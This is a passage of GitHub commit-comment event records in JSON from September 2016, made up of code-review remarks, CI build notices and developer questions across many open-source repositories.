GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-12T11:26:11Z"}
{"id":"4548725886","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18983242,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T11:26:17Z","updated_at":"2016-09-12T11:26:17Z","body":"Please, tell me who it is."}},"created_at":"2016-09-12T11:26:17Z"}
{"id":"4548733481","type":"CommitCommentEvent","actor":{"login":"ekondrashev"},"repo":{"name":"ekondrashev/quiz"},"payload":{"comment":{"id":18983265,"position":17,"line":22,"path":"src/Document.java","commit_id":"1cbf40471e1d94718665280e61a00ccf9bfee3eb","created_at":"2016-09-12T11:28:13Z","updated_at":"2016-09-12T11:28:13Z","body":"If you want to implement synchronisation, while writing to file, synchronising on file instance is not enough. Try googling about FileLock in java"}},"created_at":"2016-09-12T11:28:13Z"}
{"id":"4548734289","type":"CommitCommentEvent","actor":{"login":"christoffersch"},"repo":{"name":"SanderSalamander/salamander-overlord"},"payload":{"comment":{"id":18983269,"position":null,"line":null,"path":null,"commit_id":"a6869d4bfc29830e43e515915d4143cc62b8d3fe","created_at":"2016-09-12T11:28:26Z","updated_at":"2016-09-12T11:28:26Z","body":"man u stupid"}},"created_at":"2016-09-12T11:28:26Z"}
{"id":"4548734851","type":"CommitCommentEvent","actor":{"login":"alexsedova"},"repo":{"name":"Praqma/tracey-broker"},"payload":{"comment":{"id":18983271,"position":91,"line":91,"path":"src/main/java/net/praqma/tracey/broker/rabbitmq/RabbitMQConnection.java","commit_id":"70c54a9dfc7ec8fef547ed7b9b825eef0d4fab72","created_at":"2016-09-12T11:28:34Z","updated_at":"2016-09-12T11:28:34Z","body":"It could look like : exchange = (String)configMap.getOrDefault(\"broker.rabbitmq.exchange.name\", exchange);"}},"created_at":"2016-09-12T11:28:34Z"}
{"id":"4548740135","type":"CommitCommentEvent","actor":{"login":"rephus"},"repo":{"name":"coconauts/coconauts.github.io"},"payload":{"comment":{"id":18983290,"position":86,"line":86,"path":"source/_posts/XXXX-XX-XX-spaceroads.markdown","commit_id":"a784e55d4d7c6d6cf32dad2418823ecd94992a87","created_at":"2016-09-12T11:29:57Z","updated_at":"2016-09-12T11:29:57Z","body":"Esta captura es antigua, mola más la que me enseñaste ayer, comparada con el original, para ver como se parece. Todas estas capturas habría que guardalas en el repo, para llevar un historial de progreso "}},"created_at":"2016-09-12T11:29:57Z"}
{"id":"4548742606","type":"CommitCommentEvent","actor":{"login":"rephus"},"repo":{"name":"coconauts/coconauts.github.io"},"payload":{"comment":{"id":18983296,"position":65,"line":65,"path":"source/_posts/XXXX-XX-XX-spaceroads.markdown","commit_id":"a784e55d4d7c6d6cf32dad2418823ecd94992a87","created_at":"2016-09-12T11:30:36Z","updated_at":"2016-09-12T11:30:36Z","body":"This link is not pointing to the VR page you showed me once"}},"created_at":"2016-09-12T11:30:36Z"}
{"id":"4548743082","type":"CommitCommentEvent","actor":{"login":"mingard"},"repo":{"name":"selectize/selectize.js"},"payload":{"comment":{"id":18983298,"position":null,"line":null,"path":null,"commit_id":"51cb5c23b0ab56c00440bc1d51c8b4ebdf8d0dca","created_at":"2016-09-12T11:30:43Z","updated_at":"2016-09-12T11:30:43Z","body":"@joallard do you know when this might be released? "}},"created_at":"2016-09-12T11:30:43Z"}
{"id":"4548747833","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18983315,"position":null,"line":null,"path":null,"commit_id":"9a066dd62f09bd41165c18e475db828d8eeda3ed","created_at":"2016-09-12T11:31:55Z","updated_at":"2016-09-12T11:31:55Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 241](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1197&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:28:19"}},"created_at":"2016-09-12T11:31:55Z"}
{"id":"4548747888","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18983316,"position":null,"line":null,"path":null,"commit_id":"e1f40e7f1fd91a88289efa6fc345df39d125d917","created_at":"2016-09-12T11:31:56Z","updated_at":"2016-09-12T11:31:56Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 242](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1198&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T11:31:56Z"}
{"id":"4548749251","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18983322,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-12T11:32:19Z","updated_at":"2016-09-12T11:32:19Z","body":"Or are you going to deny me?"}},"created_at":"2016-09-12T11:32:19Z"}
{"id":"4548749813","type":"CommitCommentEvent","actor":{"login":"uaandrei"},"repo":{"name":"uaandrei/npg"},"payload":{"comment":{"id":18983323,"position":null,"line":null,"path":null,"commit_id":"f052762d09fcc0283c872588e12585fb6664532d","created_at":"2016-09-12T11:32:24Z","updated_at":"2016-09-12T11:32:24Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;vFPfq9hS&#x2F;18-todos\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> todos</a>"}},"created_at":"2016-09-12T11:32:24Z"}
{"id":"4548751393","type":"CommitCommentEvent","actor":{"login":"abisz"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":18983330,"position":14,"line":28,"path":"public/app/modules/mobidul/station/creator/directives/EditorDirective.js","commit_id":"f785aa619aab82433a73cf66b04f660b3d603d81","created_at":"2016-09-12T11:32:45Z","updated_at":"2016-09-12T11:32:45Z","body":"@miclaus Why do we need this option? It should only be hidden if there is just one state, right?"}},"created_at":"2016-09-12T11:32:45Z"}
{"id":"4548753643","type":"CommitCommentEvent","actor":{"login":"darkstar"},"repo":{"name":"benvanik/xenia"},"payload":{"comment":{"id":18983339,"position":null,"line":null,"path":null,"commit_id":"20458de7524a126c7cebeffa5d804d389e5a912a","created_at":"2016-09-12T11:33:20Z","updated_at":"2016-09-12T11:33:20Z","body":"You should open an issue for that. Adding it as a comment to a random commit (which has nothing to do with the problem you're describing) is probably not the smartest way to report a bug/regression..."}},"created_at":"2016-09-12T11:33:20Z"}
{"id":"4548755929","type":"CommitCommentEvent","actor":{"login":"clash0909"},"repo":{"name":"clash0909/Catchem-PoGo"},"payload":{"comment":{"id":18983342,"position":2,"line":1,"path":"latest.version","commit_id":"1aa326148e1e91aa8c1e013c5c3ecaec11cb42b2","created_at":"2016-09-12T11:33:56Z","updated_at":"2016-09-12T11:33:56Z","body":"ถ้าหากเข้าสู่ระบบและมีโปเก มอนแม็กซ์และ U มี spow ของโปเกมอนบอไม่หาทางออกและ ไปในวง จำกัด นี้ : 20.27.54 Pokemon สินค้าคงคลังเต็มโอนโปเกมอน ... 20.29.59ตัวละครเป็นยุ่ง มากคุณอาจจะพยายามที่จะทำ 2 หรือมากกว่าการกระทำในเวลาเดียวกัน! โปรดลองใหม่ในภายหลัง! ถ้าคุณไม่ได้ทำอะไร - ละเว้นข้อความนั้นและไม่ได้ส่งปัญหา Git!\r\n\r\nสำหรับข้อผิดพลาดการตอบกลับเข้าสู่ระบบด้วยสินค้าคงคลังโปเ​​กมอนเต็มรูปแบบและมี spow โปเกมอน``\r\n\r\n\r\n"}},"created_at":"2016-09-12T11:33:56Z"}
{"id":"4548758304","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18983345,"position":null,"line":null,"path":null,"commit_id":"e62d81544e039f42d2aa972c24d784702348565b","created_at":"2016-09-12T11:34:31Z","updated_at":"2016-09-12T11:34:31Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 982](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13110&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 247, ignored: 3 Build time: 00:10:42"}},"created_at":"2016-09-12T11:34:31Z"}
{"id":"4548760171","type":"CommitCommentEvent","actor":{"login":"ghuntley"},"repo":{"name":"paulcbetts/Fusillade"},"payload":{"comment":{"id":18983351,"position":null,"line":null,"path":null,"commit_id":"decf6660a7fe387bf19284e125a7f139309ec020","created_at":"2016-09-12T11:35:00Z","updated_at":"2016-09-12T11:35:00Z","body":"LGTM "}},"created_at":"2016-09-12T11:35:00Z"}
{"id":"4548764258","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18983358,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T11:36:03Z","updated_at":"2016-09-12T11:36:03Z","body":"No, we allow `.twig` extensions."}},"created_at":"2016-09-12T11:36:03Z"}
{"id":"4548766567","type":"CommitCommentEvent","actor":{"login":"LucHermitte"},"repo":{"name":"orfeotoolbox/OTB"},"payload":{"comment":{"id":18983362,"position":16,"line":120,"path":"Modules/ThirdParty/OssimPlugins/src/ossim/ossimSentinel1Model.cpp","commit_id":"5dec0466cabc4bcb2abeb790a4685db2daeaf9ff","created_at":"2016-09-12T11:36:37Z","updated_at":"2016-09-12T11:36:37Z","body":"SCOPED_LOG is meant to automatically generate \"module entering\" and \"module leaving\" message, even in case of exceptions.\r\n\r\nUsually my `scoped_log` classes are more advanced and count nesting level in order to automatically indent traces. We should also be able to specify trace or not trace without editing each ossim*.cpp individually. This should be handled in its own RfC/ticket IMO. (Don't forget about thread-safety when implementing such a beast)"}},"created_at":"2016-09-12T11:36:37Z"}
{"id":"4548766640","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"rust-lang-nursery/rustup.rs"},"payload":{"comment":{"id":18983363,"position":35,"line":101,"path":"src/multirust/toolchain.rs","commit_id":"ddaca07fd37303e1046a77bc03fac85a08158d9d","created_at":"2016-09-12T11:36:38Z","updated_at":"2016-09-12T11:36:38Z","body":"This `unreachable!()` condition is met when the toolchain-data is removed from the *toolchains* directory, but the respective *update-hashes* file is not.\r\n\r\nE.g.\r\n\r\nRemoved:\r\n/multirust/toolchains/nightly-x86_64-unknown-linux-gnu\r\n\r\nNot removed:\r\n/multirust/update-hashes/nightly-x86_64-unknown-linux-gnu\r\n\r\n`rustup` now panics when trying to install `nightly-x86_64-unknown-linux-gnu`."}},"created_at":"2016-09-12T11:36:38Z"}
{"id":"4548770674","type":"CommitCommentEvent","actor":{"login":"Merf61"},"repo":{"name":"leopck/Yee-Light-Blue"},"payload":{"comment":{"id":18983370,"position":null,"line":null,"path":null,"commit_id":"1728d73ed82a292f8e68e1bdffaef2ee5c650ea2","created_at":"2016-09-12T11:37:40Z","updated_at":"2016-09-12T11:37:40Z","body":"Thank you for the reply. This is a big project for me but it has been put\non hold for other more pressing matters. I plan on getting back to it soon\nIf I may can I email you if I can't figure it out?\n\nCheers Kev\n\nOn Wed, Aug 31, 2016 at 12:22 AM, Stanley <notifications@github.com> wrote:\n\n> Hey sorry, I did not see your comment on this commit. I hope it's not too\n> late to answer your question. That is strange. You're supposed to see the\n> Yee Light change from Red to Green to Blue and turn off then turn on. If\n> you do not see that, you'll need to debug manually a bit.\n>\n> Try doing this. Run the python in interpreter mode then manually key each\n> line one by one.\n>\n> import yeelightblue\n> import time\n>\n> x = yeelightblue.YeeLightBlue(\"xx:xx:xx:xx:xx:xx\", \"hciX\")\n> x.control('255','0','0','100') #Changes your LED to red color\n>\n> enter your MAC address and the HCIx interface number inside the xx. Also,\n> if I'm not mistaken Yee Light 2 is the same code as Yee Light 1 so it\n> should work. Let me know if you managed to fix it.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/leopck/Yee-Light-Blue/commit/1728d73ed82a292f8e68e1bdffaef2ee5c650ea2#commitcomment-18840804>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARqB6B0trRI_evzPvUDg-8TXh1K_bfdGks5qlQFugaJpZM4IKjlf>\n> .\n>\n"}},"created_at":"2016-09-12T11:37:40Z"}
{"id":"4548771192","type":"CommitCommentEvent","actor":{"login":"benavern"},"repo":{"name":"YannBertrand/YouWatch"},"payload":{"comment":{"id":18983371,"position":46,"line":44,"path":"gulpfile.js","commit_id":"6969cb052b3d79fdb7a793ba65b280e0db9b2cc0","created_at":"2016-09-12T11:37:48Z","updated_at":"2016-09-12T11:37:48Z","body":"Are you sure the transpile task is terminated when restart is fired ?"}},"created_at":"2016-09-12T11:37:48Z"}
{"id":"4548775668","type":"CommitCommentEvent","actor":{"login":"Andrey9kin"},"repo":{"name":"Praqma/tracey-broker"},"payload":{"comment":{"id":18983385,"position":91,"line":91,"path":"src/main/java/net/praqma/tracey/broker/rabbitmq/RabbitMQConnection.java","commit_id":"70c54a9dfc7ec8fef547ed7b9b825eef0d4fab72","created_at":"2016-09-12T11:38:57Z","updated_at":"2016-09-12T11:38:57Z","body":"Cool, missed that\n\nMake it a great day, Andrey\n\nOn Mon, Sep 12, 2016 at 1:28 PM, alexsedova <notifications@github.com>\nwrote:\n\n> It could look like : exchange = (String)configMap.getOrDefault(\"\n> broker.rabbitmq.exchange.name\", exchange);\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Praqma/tracey-broker/commit/70c54a9dfc7ec8fef547ed7b9b825eef0d4fab72#commitcomment-18983271>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABmB8CL8FevJqVhFuwZJoorRCOKxdSApks5qpTdjgaJpZM4J6c76>\n> .\n>\n"}},"created_at":"2016-09-12T11:38:57Z"}
{"id":"4548776156","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18983387,"position":null,"line":null,"path":null,"commit_id":"3585190924deb54cff62bd725958a09859378fba","created_at":"2016-09-12T11:39:05Z","updated_at":"2016-09-12T11:39:05Z","body":"Frustrating... Not only are we still getting the wrong `CXXFLAGS` due to a bug in the script, the script dies after running two hours:\r\n\r\n```\r\n./cryptest.sh: line 3514: conditional binary operator expected\r\n./cryptest.sh: line 3514: expected `)'\r\n./cryptest.sh: line 3514: syntax error near `-n'\r\n./cryptest.sh: line 3514: `             if [[ (echo -n \"$SUNCC_SSE_CXXFLAGS\" |\r\n```\r\n"}},"created_at":"2016-09-12T11:39:05Z"}
{"id":"4548776834","type":"CommitCommentEvent","actor":{"login":"juliuste"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18983390,"position":11,"line":11,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T11:39:15Z","updated_at":"2016-09-12T11:39:15Z","body":"Doesn't WGS84 \"only\" define a global reference ellipsoide for lon/lat coordinates? Returning longitude and latitude wouldn't make any sense, though. Mercator seems like the best choice since you need some kind of a two-dimensional projection."}},"created_at":"2016-09-12T11:39:15Z"}
{"id":"4548780904","type":"CommitCommentEvent","actor":{"login":"bingmann"},"repo":{"name":"thrill/thrill"},"payload":{"comment":{"id":18983400,"position":14,"line":94,"path":"examples/select/select.hpp","commit_id":"0819c915f3c9a79b99655ce47802c8f3c949ec41","created_at":"2016-09-12T11:40:18Z","updated_at":"2016-09-12T11:40:18Z","body":"Open for better suggestions. The problem is that one cannot know if a DIA will be used again in the future."}},"created_at":"2016-09-12T11:40:18Z"}
{"id":"4548785529","type":"CommitCommentEvent","actor":{"login":"nifengcn"},"repo":{"name":"git/git"},"payload":{"comment":{"id":18983411,"position":null,"line":null,"path":null,"commit_id":"e83c5163316f89bfbde7d9ab23ca2e25604af290","created_at":"2016-09-12T11:41:25Z","updated_at":"2016-09-12T11:41:25Z","body":"mark is a must"}},"created_at":"2016-09-12T11:41:25Z"}
{"id":"4548787341","type":"CommitCommentEvent","actor":{"login":"PeratX"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18983415,"position":null,"line":null,"path":null,"commit_id":"eec8e477fee9ead1cb3bb094c3ca9aa6e37f447d","created_at":"2016-09-12T11:41:54Z","updated_at":"2016-09-12T11:41:54Z","body":"@dktapps Ask help for DaylightDetectorInverted's power calculation"}},"created_at":"2016-09-12T11:41:54Z"}
{"id":"4548788240","type":"CommitCommentEvent","actor":{"login":"juliuste"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18983418,"position":32,"line":32,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T11:42:10Z","updated_at":"2016-09-12T11:42:10Z","body":"How would that be fixed? I'd still have to add the other types?"}},"created_at":"2016-09-12T11:42:10Z"}
{"id":"4548790058","type":"CommitCommentEvent","actor":{"login":"lukas1"},"repo":{"name":"PhilJay/MPAndroidChart"},"payload":{"comment":{"id":18983421,"position":null,"line":null,"path":null,"commit_id":"7462c083f9c71c908589ec358543cb9fbe58e0a1","created_at":"2016-09-12T11:42:35Z","updated_at":"2016-09-12T11:42:35Z","body":"I'm not 100% sure about this, because I haven't really spent that much time debugging the library, but if I understand it correctly, you probably don't want to draw a whole circle, if `sweepAngleOuter` (and `sweepAngleInner` in for that matter probably too) is 0 or close to 0... \r\n\r\nI've tried this condition and it worked for me, but I'd rather check it with you guys:\r\n\r\n`if (sweepAngleOuter % 360f <= Utils.FLOAT_EPSILON && sweepAngleOuter > Utils.FLOAT_EPSILON)`\r\n\r\nPerhaps I'm ignoring some edge case, where you WANT whole circle to be drawn even for sweep angle of size `0.0f`"}},"created_at":"2016-09-12T11:42:35Z"}
{"id":"4548795872","type":"CommitCommentEvent","actor":{"login":"jacegu"},"repo":{"name":"dnsimple/dnsimple-elixir"},"payload":{"comment":{"id":18983431,"position":null,"line":null,"path":null,"commit_id":"a1dd60581692ceb100f5c4cd56a9652df9b38af4","created_at":"2016-09-12T11:44:06Z","updated_at":"2016-09-12T11:44:06Z","body":"NOTE: _I will revert this commit before merging this PR as I only added it to showcase the usage of Poison decoding capabilities._\r\n\r\nAfter [@aeden's comment](https://github.com/dnsimple/dnsimple-elixir/pull/49#issuecomment-245622102) I decided to give Poison decoders a try. I did not take them into consideration on the first place because I thought it was going to be tricky to change all the parsing code to use them. However, as you can see in the test I just added, it's pretty straightforward.\r\n\r\nMy proposal is to change the way `Response.parse` behaves so in [the `kind` parameter](https://github.com/dnsimple/dnsimple-elixir/blob/master/lib/dnsimple/response.ex#L39) it takes we actually provide the format that will be passed to Poison to decode the response body (the value for the `:as` keyword when calling `Poison.decode`).\r\n\r\nI'd merge this PR as is and accomplish the change immediately after in a separate PR since every single call to `Response.parse` should be changed. \r\n\r\nThoughts @aeden @weppos ?\r\n"}},"created_at":"2016-09-12T11:44:06Z"}
{"id":"4548797418","type":"CommitCommentEvent","actor":{"login":"IBAGomelTutor"},"repo":{"name":"AleksandraBorodich/JS"},"payload":{"comment":{"id":18983434,"position":1,"line":1,"path":"autocompletion/autocompletion.html","commit_id":"92420338de2aac2a005e9a1d25a4614c17d76fdd","created_at":"2016-09-12T11:44:30Z","updated_at":"2016-09-12T11:44:30Z","body":"Incorrect behavior after following steps:\r\n1. enter any character to input field\r\n2. press backspace button"}},"created_at":"2016-09-12T11:44:30Z"}
{"id":"4548797736","type":"CommitCommentEvent","actor":{"login":"YannBertrand"},"repo":{"name":"YannBertrand/YouWatch"},"payload":{"comment":{"id":18983435,"position":46,"line":44,"path":"gulpfile.js","commit_id":"6969cb052b3d79fdb7a793ba65b280e0db9b2cc0","created_at":"2016-09-12T11:44:35Z","updated_at":"2016-09-12T11:44:35Z","body":"I wasn't sure that it would **always** check if the transpile task was done, so I decided to remove it anyway. May need more testing as I'm not sure :smile: "}},"created_at":"2016-09-12T11:44:35Z"}
{"id":"4548798912","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18983436,"position":null,"line":null,"path":null,"commit_id":"eec8e477fee9ead1cb3bb094c3ca9aa6e37f447d","created_at":"2016-09-12T11:44:53Z","updated_at":"2016-09-12T11:44:53Z","body":"The current calculation for regular ones isn't right yet.\r\nOnce you get regular ones working correctly, the power output of an inverted one = 15 - the output of a regular one at that specific time. Ez pz. :D"}},"created_at":"2016-09-12T11:44:53Z"}
{"id":"4548801930","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"koying/SPMC"},"payload":{"comment":{"id":18983440,"position":null,"line":null,"path":null,"commit_id":"115edb86cd517d24e1ef0beb2551fd94860d7578","created_at":"2016-09-12T11:45:37Z","updated_at":"2016-09-12T11:45:37Z","body":"Google is so full of crap :) At least they could post definitive examples of the proper setup and handling of all encoded formats instead of making us hunt and peck. Even ExoPlayer is vauge regarding them except for one thing, don't use position for encoded, use timebase.\r\n\r\nSDK 22 is quirky with position, I see reported position > actual for ac3 on fireOS all the time while SDK 23 (shield) is in perfect alignment. Go figure :)"}},"created_at":"2016-09-12T11:45:37Z"}
{"id":"4548803006","type":"CommitCommentEvent","actor":{"login":"samdroid-apps"},"repo":{"name":"samdroid-apps/sugar"},"payload":{"comment":{"id":18983443,"position":84,"line":84,"path":"src/jarabe/journal/projectview.py","commit_id":"67b546ef5d81f7b0968fda06d99a5767e12953aa","created_at":"2016-09-12T11:45:54Z","updated_at":"2016-09-12T11:45:54Z","body":"Thanks for the advice.  Sorry for asking the dumb question, I thought that\nit was fully automated!  I found that I could (in fish):\n\n```\nset sources (grep -r '_([\"\\']' src | awk '{ split($0, a, \":\"); print a[1]\n}' | sort -u)\nfor source in $sources\n    grep $source po/POTFILES.in > /dev/null\n    if test $status -eq 1\n        echo $source\n    end\nend\n```\n\nOn Mon, Sep 5, 2016 at 8:24 AM James Cameron <notifications@github.com>\nwrote:\n\n> I've no optimal method. It was a chance discovery. I'll speculate:\n>\n>    - Checkout a detached HEAD as of last update of POTFILES.in (cbf37e6\n>    <https://github.com/samdroid-apps/sugar/commit/cbf37e6ae94bbea86f801861759c37290a155700>),\n>    and make a list of *.py files in the tree.\n>    - Checkout master, and make another list of *.py files in the tree.\n>    - Compare the lists to generate a list of new *.py files since last\n>    update of POTFILES.in.\n>    - Look in those files for _(' or _(\", which gives you a list of files\n>    to append to POTFILES.in,\n>    - edit POTFILES.in, sort, colour in crayon for entertainment to\n>    compensate for the utter drudgery of it all, then commit the change.\n>    - re-read man grep to learn how to automate it, especially --file and\n>    --invert-match, or write something in Python, or find that someone\n>    already did it. 😦\n>    - whinge in future pull requests that forget to update POTFILES.in. 😁\n>\n> —\n> You are receiving this because you commented.\n>\n>\n> Reply to this email directly, view it on GitHub\n> <https://github.com/samdroid-apps/sugar/commit/67b546ef5d81f7b0968fda06d99a5767e12953aa#commitcomment-18894424>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFvjmpJ0Qi8e4ZGMLunOPiIH1QMQ2tc7ks5qm0UbgaJpZM4J0o49>\n> .\n>\n"}},"created_at":"2016-09-12T11:45:54Z"}
{"id":"4548803344","type":"CommitCommentEvent","actor":{"login":"liuxyc"},"repo":{"name":"Valloric/YouCompleteMe"},"payload":{"comment":{"id":18983444,"position":null,"line":null,"path":null,"commit_id":"5dca552d5daee69c064374146bcda9e63be63b20","created_at":"2016-09-12T11:46:00Z","updated_at":"2016-09-12T11:46:00Z","body":"Error detected while processing function <SNR>21_OnBufferRead:                                                                                                                               \r\nline   17:                                                                                                                                                                                   \r\nE117: Unknown function: UltiSnips#SnippetsInCurrentScope                                                                                                                                     \r\nE15: Invalid expression: UltiSnips#SnippetsInCurrentScope( 1 )                                                                                                                               \r\nError detected while processing function <SNR>85_AcceptSelection..webdevicons#ctrlPOpenFunc..ctrlp#acceptfile:                                                                               \r\nline   49:                                                                                                                                                                                   \r\nE171: Missing :endif                       \r\n      \r\nafter I install UltiSnips, this issue no longer exists"}},"created_at":"2016-09-12T11:46:00Z"}
{"id":"4548806362","type":"CommitCommentEvent","actor":{"login":"troySteveHUNT"},"repo":{"name":"github/gitignore"},"payload":{"comment":{"id":18983457,"position":null,"line":null,"path":null,"commit_id":"4ac02fc2828adfc2e4e9327a09860e765b697057","created_at":"2016-09-12T11:46:43Z","updated_at":"2016-09-12T11:46:43Z","body":"TROID NOT ANDROID "}},"created_at":"2016-09-12T11:46:43Z"}
{"id":"4548810901","type":"CommitCommentEvent","actor":{"login":"troySteveHUNT"},"repo":{"name":"github/gitignore"},"payload":{"comment":{"id":18983474,"position":null,"line":null,"path":null,"commit_id":"4ac02fc2828adfc2e4e9327a09860e765b697057","created_at":"2016-09-12T11:47:47Z","updated_at":"2016-09-12T11:47:47Z","body":"![23775419](https://cloud.githubusercontent.com/assets/22071281/18434785/dc2de36e-78f7-11e6-8f61-d35cf06f604a.jpg)\r\n"}},"created_at":"2016-09-12T11:47:47Z"}
{"id":"4548810889","type":"CommitCommentEvent","actor":{"login":"thibaudcolas"},"repo":{"name":"springload/frontend-starter-kit"},"payload":{"comment":{"id":18983475,"position":2,"line":2,"path":"core/templates/core/snippets/icon.html","commit_id":"2acf67490a4494b0a50d5ea463d79ebc21c574d9","created_at":"2016-09-12T11:47:51Z","updated_at":"2016-09-12T11:47:51Z","body":"@samanthaksanders I'm wondering how to make this as accessible as possible. This is probably one of the snippets of code I/we reuse everywhere on every projects, so I think it's worth spending a bit of extra time on it to get it right.\r\n\r\nHere are some of my questions:\r\n\r\n- The `title` tag is there to do what a `title` attribute would do in HTML. All good so far.\r\n- Should the `svg` elt have `aria-hidden=\"true\"` and `aria-role=\"presentation\"` attributes? \r\n- _If the title tag is there_, should those attributes be set to true / presentation?\r\n\r\nHere is an example from the Springload website (footer link icons):\r\n\r\n```html\r\n<a href=\"https://github.com/springload\" target=\"_blank\" rel=\"noopener\" class=\"social-link social-link--github\">\r\n     <svg aria-hidden=\"true\" class=\"svg-icon social-icon\">\r\n             <use xlink:href=\"#github\"></use>\r\n      </svg>\r\n</a>\r\n```\r\n\r\nInstead, I think I would want to have a `<title>` of \"Springload on GitHub\" or something to that effect, but also not have `aria-hidden=\"true\"` (that is, if there is a title). What do you think?\r\n\r\nNB: I had a look at this http://john.foliot.ca/aria-hidden/ when trying to figure out if I should use `aria-hidden=\"true\"` or `aria-role=\"presentation\"`. The article seems to say you should use both at once for browser support reasons."}},"created_at":"2016-09-12T11:47:51Z"}
{"id":"4548810950","type":"CommitCommentEvent","actor":{"login":"juliuste"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18983476,"position":29,"line":29,"path":"package.json","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T11:47:52Z","updated_at":"2016-09-12T11:47:52Z","body":"As far as I can see, the 2nd paragraph is included? And the title doesn't make a difference since it won't change the formal license description, or does it?"}},"created_at":"2016-09-12T11:47:52Z"}
{"id":"4548811830","type":"CommitCommentEvent","actor":{"login":"oalexey"},"repo":{"name":"xbadcode/Rubezh"},"payload":{"comment":{"id":18983481,"position":null,"line":null,"path":null,"commit_id":"b63ddc35bfbd1bc2f05b000e13c7f45a78d0e6ec","created_at":"2016-09-12T11:48:07Z","updated_at":"2016-09-12T11:48:07Z","body":"1. Считаю, что зря заменил\r\n   const int stride = width/8;\r\nна\r\n   var stride = width/8;\r\nТ.к. конструкция \"const\" гарантирует неизменность данного параметра. В твоем случае программер \"с кривыми руками\" может свободно поменять значение \"stride\"\r\n\r\n2. Нужны ли данные файлы?\r\n1) Projects\\FiresecService\\FiresecService.Report\\Reports\\PrintPassCardTemplate.cs;\r\n2) Projects\\FiresecService\\FiresecService.Report\\Reports\\Base.cs\r\n\r\n"}},"created_at":"2016-09-12T11:48:07Z"}
{"id":"4548812738","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18983484,"position":32,"line":32,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T11:48:21Z","updated_at":"2016-09-12T11:48:21Z","body":"It would only be `Polygon` & `LineString` (2 instead of 6). If you want to render `Point`s (which you don't do right now), it would be 3 instead of 8."}},"created_at":"2016-09-12T11:48:21Z"}
{"id":"4548813468","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":18983488,"position":1,"line":1,"path":"main/src/addins/MonoDevelop.UnitTesting.NUnit/NUnit3Runner/NUnit3Runner64.csproj","commit_id":"2006a09de07c5710652aa9d90f80e77f7f6118f8","created_at":"2016-09-12T11:48:32Z","updated_at":"2016-09-12T11:48:32Z","body":"This is for Windows too."}},"created_at":"2016-09-12T11:48:32Z"}
